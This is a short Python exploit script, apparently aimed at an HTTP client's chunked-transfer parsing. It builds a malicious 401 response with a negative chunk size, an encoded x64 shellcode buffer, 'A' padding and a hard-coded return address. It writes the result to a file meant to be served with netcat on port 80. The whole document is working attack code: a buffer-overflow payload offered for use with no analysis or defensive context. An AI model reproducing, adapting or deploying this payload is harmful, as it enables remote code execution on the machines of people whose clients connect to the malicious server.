shellcode.py

# coding=utf-8
# author : k2yk

# usage python shellcode.py&nc -lp 80 < payload

Payload = """HTTP/1.1 401 Not Authorized
Content-Type: text/plain; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive

-0xFFFFFD00
"""
buf =  ""
buf += "\x48\x31\xc9\x48\x81\xe9\xfa\xff\xff\xff\x48\x8d\x05"
buf += "\xef\xff\xff\xff\x48\xbb\xc5\xb5\xcb\x60\x1e\xba\xb2"
buf += "\x1b\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4"
buf += "\xaf\x8e\x93\xf9\x56\x01\x9d\x79\xac\xdb\xe4\x13\x76"
buf += "\xba\xe1\x53\x4c\x52\xa3\x4d\x7d\xba\xb2\x53\x4c\x53"
buf += "\x99\x88\x16\xba\xb2\x1b\xea\xd7\xa2\x0e\x31\xc9\xda"
buf += "\x1b\x93\xe2\x83\xe9\xf8\xb5\xb7\x1b"

Payload += buf+(568-len(buf))*"A"
Payload += "\xdd\xdd\xff\xff\xff\x7f\x00\x00" #SHELLCODE 起始地址 如无意外需自己手动定位
Payload += "\n0\n"



with open('payload','wb') as filePayload:
    filePayload.write(Payload)
    filePayload.flush()